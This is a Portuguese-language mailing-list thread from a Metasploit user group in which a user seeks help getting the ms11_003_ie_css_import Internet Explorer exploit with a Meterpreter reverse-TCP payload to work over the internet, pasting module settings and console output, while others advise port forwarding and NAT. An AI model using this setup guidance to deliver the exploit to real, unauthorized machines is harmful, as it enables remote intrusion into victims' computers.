Erro ao usar Mestaploit fora da rede local.

[Marcello]

Boa noite!

Pessoal, estou tendo problemas com o MESTASPLOIT. Sempre quando uso em
minha rede doméstica aqui em casa LAN, o metasploit funciona
direitinho. Quando tento utilizar o meu IP real ele cria a URL com meu
ip local e não meu IP real, mesmo alterando o comando LHOST com ip
real e mantendo o SRVHOST como ip local.
O exploit que estou utilizando é o "ms11_003_ie_css_import" com o
payload "windows/meterpreter/reverse_tcp".

Já tentei de tudo alterar o SRVHOST, LHOST, SRVPORT, LPORT e nada do
exploit funcionar e gerar o link com meu ip real... às vezes dá o erro
"Exploit exception: The address is already in use (189.15.*.*:8080) ---
> quando uso IP REAL com o comando set SRVHOST".

Alguém ja conseguiu ter sucesso com metasploit fora da rede local
(LAN), na internet (IP REAL)???

Nos teste aqui em casa dentro da mesma LAN ele funciona, mas eu queria
utilizar ele pela internet.


Valeu!

[Noilson Caio]

O erro mostrado foi que a porta ta em uso. Tente mudar para algo mais alto 9999

mobile

--
Você está recebendo esta mensagem porque se inscreveu no grupo "Metasploit Brasil" dos Grupos do Google.
Para postar neste grupo, envie um e-mail para metasplo...@googlegroups.com.
Para cancelar a inscrição nesse grupo, envie um e-mail para metasploit-bra...@googlegroups.com.
Para obter mais opções, visite esse grupo em http://groups.google.com/group/metasploit-brasil?hl=pt-BR.

[Marcello]

Boa tarde!

Já havia pesquisado o erro no google e muitas pessoas disseram que a porta que estava em uso, mas mesmo alterando a porta o erro persiste.
O erro só ocorre quando altero o SRVHOST para o meu IP real (mas o exploit diz que este deve ser o IP local da máquina SRVHOST) mas se eu utilizo o ip local o link que ele gera para o ataque é com meu ip local, mesmo quando altero o LHOST (onde eu acrdito que deve ser colocado o IP real - Listen address) o link criado para o ataque é com meu ip local. Obeserve todas as config utilizadas:

>show options
Module options (exploit/windows/browser/ms11_003_ie_css_import):

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     192.168.*.*    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0 (MEU IP LOCAL)
SRVPORT     9999             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, none, process
LHOST     189.15.*.*    yes       The listen address (MEU IP REAL)
LPORT     4444             yes       The listen port


Exploit target:

Id  Name
--  ----
1   Internet Explorer 8


[*] Exploit running as background job.

[-] Handler failed to bind to 189.15.*.*:4444 (meu ip REAL - mesmo com a falha aqui ele gera o link que funciona na minha rede local)
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.*.*:9999/teste (link gerado com meu ip LOCAL)
[*] Server started.


ESTE É O ERRO QUE OCORRE QUANDO ALTERO O SRVHOST PARA O MEU IP REAL:

[*] Exploit running as background job.

[-] Handler failed to bind to 189.15.*.*:4444 (MEU IP REAL)
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit exception: The address is already in use (189.15.*.*:9999). (ERRO FDP!)



Já até alterei meu ROUTER liberei portas e tal... Mais tarde vou tentar ligar o PC direto pelo modem e ver o que acontece.
Estou utilizando o UBUNTU 10.04, e estou desconfiando que é alguma config do Linux mesmo.
Alguma pista???

Abraços!

---

Em 21/07/2011 07:46, Noilson Caio < caio...@gmail.com > escreveu:

O erro mostrado foi que a porta ta em uso. Tente mudar para algo mais alto 9999

mobile

 

Em 21/07/2011 01:13, "Marcello" <marcel...@uol.com.br>escreveu:

Boa noite!

Pessoal, estou tendo problemas com o MESTASPLOIT. Sempre quando uso em
minha rede doméstica aqui em casa LAN, o metasploit funciona
direitinho. Quando tento utilizar o meu IP real ele cria a URL com meu
ip local e não meu IP real, mesmo alterando o comando LHOST com ip
real e mantendo o SRVHOST como ip local.
O exploit que estou utilizando é o "ms11_003_ie_css_import" com o
payload "windows/meterpreter/reverse_tcp".

Já tentei de tudo alterar o SRVHOST, LHOST, SRVPORT, LPORT e nada do
exploit funcionar e gerar o link com meu ip real... às vezes dá o erro
"Exploit exception: The address is already in use (189.15.*.*:8080) ---
> quando uso IP REAL com o comando set SRVHOST".

Alguém ja consegui u ter sucesso com metasploit fora da rede local

[Luizfzs]

É provável que você tenha que fazer encaminhamento no seu roteador. Se
seu ip interno é 192.168.0.100 e a porta que você usa é 4444, você
deve criar uma regra de encaminhamento. Na porta do roteador você
coloca 4444 e encaminha para o ip 192.168.0.100 e porta 4444.

Espero que isso resolva :)

On 21 jul, 07:46, Noilson Caio <caiog...@gmail.com> wrote:
> O erro mostrado foi que a porta ta em uso. Tente mudar para algo mais alto
> 9999
>
> mobile
>

[Israel Borges]

Quando é necessário uma porta em escuta, é necessário que você faça um NAT para o IP local:PORTA no modem, já fez isso?

--
Você está recebendo esta mensagem porque se inscreveu no grupo "Metasploit Brasil" dos Grupos do Google.
Para postar neste grupo, envie um e-mail para metasplo...@googlegroups.com.
Para cancelar a inscrição nesse grupo, envie um e-mail para metasploit-bra...@googlegroups.com.
Para obter mais opções, visite esse grupo em http://groups.google.com/group/metasploit-brasil?hl=pt-BR.

--
Atenciosamente,


Israel Borges
Especialista em Segurança em Redes de Computadores
Cel: (62) 9201-8565
E-mail: israel...@gmail.com
Msn: israel...@hotmail.com
Skype: israelborgess

Nada é impossivel para aquele que persiste!
"Alexandre O Grande"

[Andi]

Olha para colocar os ip's externos, até onde eu sei, tu tem que usar as macros RHOST e RPORT.

Até.

--
[]'s
..:: Andi ::..
.:: Remember: Hack the world. Save the planet ::.

[Damiel Sestrem]

ol� amigo
voce conseguiu acesso na sua lan com sucesso? eu nao consegui ainda

o alvo estava com xp sp3 ou 7 ?

--------------------------------------------------
From: "Marcello" <marcel...@uol.com.br>
Sent: Wednesday, July 20, 2011 8:46 PM
To: "Metasploit Brasil" <metasplo...@googlegroups.com>
Subject: Erro ao usar Mestaploit fora da rede local.

> Boa noite!
>
> Pessoal, estou tendo problemas com o MESTASPLOIT. Sempre quando uso em

> minha rede dom�stica aqui em casa LAN, o metasploit funciona

> direitinho. Quando tento utilizar o meu IP real ele cria a URL com meu

> ip local e n�o meu IP real, mesmo alterando o comando LHOST com ip

> real e mantendo o SRVHOST como ip local.

> O exploit que estou utilizando � o "ms11_003_ie_css_import" com o
> payload "windows/meterpreter/reverse_tcp".
>
> J� tentei de tudo alterar o SRVHOST, LHOST, SRVPORT, LPORT e nada do
> exploit funcionar e gerar o link com meu ip real... �s vezes d� o erro

> "Exploit exception: The address is already in use (189.15.*.*:8080) ---
>> quando uso IP REAL com o comando set SRVHOST".
>

> Algu�m ja conseguiu ter sucesso com metasploit fora da rede local

> (LAN), na internet (IP REAL)???
>
> Nos teste aqui em casa dentro da mesma LAN ele funciona, mas eu queria
> utilizar ele pela internet.
>
>
> Valeu!
>

> --
> Voc� est� recebendo esta mensagem porque se inscreveu no grupo "Metasploit

> Brasil" dos Grupos do Google.
> Para postar neste grupo, envie um e-mail para
> metasplo...@googlegroups.com.

> Para cancelar a inscri��o nesse grupo, envie um e-mail para
> metasploit-bra...@googlegroups.com.
> Para obter mais op��es, visite esse grupo em
> http://groups.google.com/group/metasploit-brasil?hl=pt-BR.
>

[Maycon Maia Vitali]

Talvez seja necessário fazer redirecionamento de portas no seu modem/router. :-)

----
Maycon Maia Vitali ( 0ut0fBound )
Mestrando em Informática - UFES

Security Researcher @ Hack'n Roll
http://maycon.hacknroll.com
Hack'n Roll

"Confia os teus cuidados ao Senhor, e ele te susterá; jamais permitirá que o justo seja abalado" (Salmos 55:22)

Em 20 de julho de 2011 20:46, Marcello <marcel...@uol.com.br> escreveu:

--
Você está recebendo esta mensagem porque se inscreveu no grupo "Metasploit Brasil" dos Grupos do Google.

Para postar neste grupo, envie um e-mail para metasplo...@googlegroups.com.

Para cancelar a inscrição nesse grupo, envie um e-mail para metasploit-bra...@googlegroups.com.
Para obter mais opções, visite esse grupo em http://groups.google.com/group/metasploit-brasil?hl=pt-BR.

[Marcello]

Olá Damiel!

Eu consegui "parcialmente", numa máquina com Xindows XP SP3 com IE7... Quando acesso o link pelo IE recebo a resposta pelo Metasploit, mas o IE7 da máquina alvo trava e fecha e não completa a conexão reversa. O interessanta também é que o antivírus da maquina alvo detecta o ataque (ponto pro Avira).
Vou testar mais um pouco pela minha rede local até conseguir uma shell válida e testar os comandos do meterpreter.

Quanto a liberar o roteador eu já criei umas regras de portfowarding pra liberar a porta 4444 e direcionar para meu IP local.

Vou testar a sugertão de utilizar o RHOST e RPORT...

Abraços!

---

Em 21/07/2011 07:01, Damiel Sestrem < xda...@gmail.com > escreveu:
olá amigo

voce conseguiu acesso na sua lan com sucesso? eu nao consegui ainda

o alvo estava com xp sp3 ou 7 ?


--------------------------------------------------
From: "Marcello"

Sent: Wednesday, July 20, 2011 8:46 PM
To: "Metasploit Brasil"

Subject: Erro ao usar Mestaploit fora da rede local.

> Boa noite!
>
> Pessoal, estou tendo problemas com o MESTASPLOIT. Sempre quando uso em

> minha rede doméstica aqui em casa LAN, o metasploit funciona

> direitinho. Quando tento utilizar o meu IP real ele cria a URL com meu

> ip local e não meu IP real, mesmo alterando o comando LHOST com ip

> real e mantendo o SRVHOST como ip local.

> O exploit que estou utilizando é o "ms11_003_ie_css_import" com o
> payload "windows/meterpreter/reverse_tcp".
>
> Já tentei de tudo alterar o SRVHOST, LHOST, SRVPORT, LPORT e nada do
> exploit funcionar e gerar o link com meu ip real... às vezes dá o erro

> "Exploit exception: The address is already in use (189.15.*.*:8080) ---
>> quando uso IP REAL com o comando set SRVHOST".
>

> Alguém ja conseguiu ter sucesso com metasploit fora da rede local

> (LAN), na internet (IP REAL)???
>
> Nos teste aqui em casa dentro da mesma LAN ele funciona, mas eu queria
> utilizar ele pela internet.
>
>
> Valeu!
>
> --

> Você está recebendo esta mensagem porque se inscreveu no grupo "Metasploit

> Brasil" dos Grupos do Google.
> Para postar neste grupo, envie um e-mail para
> metasplo...@googlegroups.com.

> Para cancelar a inscrição nesse grupo, envie um e-mail para
> metasploit-bra...@googlegroups.com.
& gt; Para obter mais opções, visite esse grupo em
> http://groups.google.com/group/metasploit-brasil?hl=pt-BR.
>

--
Você está recebendo esta mensagem porque se inscreveu no grupo "Metasploit Brasil" dos Grupos do Google.

Para postar neste grupo, envie um e-mail para metasplo...@googlegroups.com.

Para cancelar a inscrição nesse grupo, envie um e-mail para metasploit-bra...@googlegroups.com.
Para obter mais opções, visite esse grupo em http://groups.google.com/group/metasploit-brasil?hl=pt-BR.